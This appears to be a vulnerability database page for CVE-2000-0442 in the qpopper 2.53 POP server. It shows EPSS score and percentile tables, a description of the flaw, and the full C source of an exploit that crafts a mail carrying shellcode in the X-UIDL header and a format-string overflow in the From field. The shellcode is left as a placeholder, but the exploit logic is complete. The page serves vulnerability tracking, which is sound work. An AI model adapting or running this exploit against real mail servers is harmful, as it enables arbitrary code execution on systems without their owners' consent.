CVE-2000-0442 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.77%	–	–
2022-03-27	–	–	3.77%	–	–
2022-04-03	–	–	3.77%	–	–
2022-09-25	–	–	3.77%	–	–
2023-03-12	–	–	–	0.33%	–
2023-09-10	–	–	–	0.33%	–
2024-02-11	–	–	–	0.47%	–
2024-06-02	–	–	–	0.47%	–
2024-12-22	–	–	–	0.47%	–
2025-01-19	–	–	–	0.47%	–
2025-01-19	–	–	–	0.47%	–
2025-03-18	–	–	–	–	3.99%
2025-03-30	–	–	–	–	3.99%
2025-03-30	–	–	–	–	3.99,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	67%
2022-03-27	68%
2022-04-03	84%
2022-09-25	85%
2023-03-12	67%
2023-09-10	68%
2024-02-11	75%
2024-06-02	76%
2024-12-22	75%
2025-01-19	76%
2025-01-19	76%
2025-03-18	88%
2025-03-30	87%
2025-03-30	87%

// source: https://www.securityfocus.com/bid/1242/info A vulnerability exists in version 2.53 and prior of qpopper, a popular POP server, from Qualcomm. By placing machine executable code in the X-UIDL header field, supplying formatting strings in the "From:" field in a mail header, and then issuing, as the user the mail was sent to, a 'euidl' command, it is possible to execute arbitrary code. This code will execute as the user executing the euidl command, but with group 'mail' permissions on hosts running qpopper in that group. This is often done due to mail spool permissions. This vulnerability does not exist in versions after 2.53. It also requires an account on the machine. /* qpop_euidl.c exploit by prizm/Buffer0verflow Security * * Sample exploit for buffer overflow in Qpopper 2.53. * This little proggie generates a mail u need to send. * * Standard disclaimer applies. * By the way, exploit is broken =) You need to insert shellcode. * * MAD greets to tf8 for pointing out the bug, and all other b0f members. * greets to USSRLabs and ADM * check http://b0f.freebsd.lublin.pl/ for news. */ #include <stdio.h> #include <string.h> char shellcode[]="imnothing"; int main(int argc, char *argv[]) { int i; unsigned long ra=0; if(argc!=2) { fprintf(stderr,"Usage: %s return_addr\n", argv[0]); exit(0); } sscanf(argv[1], "%x", &ra); if(!ra) return; if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) { fprintf(stderr,"Bad shellcode\n"); exit(0); } fprintf(stderr,"return address: 0x%.8x\n", ra); printf("X-UIDL: "); for(i=0; i < sizeof(shellcode);i++) printf("%c", shellcode[i]); printf("\r\n"); printf("From: %s", "%.1000d"); for(i=0; i < 50; i++) printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24); printf("@test\r\n"); printf("Subject: test\r\n\r\nhuh?\r\n.\r\n"); return 0; }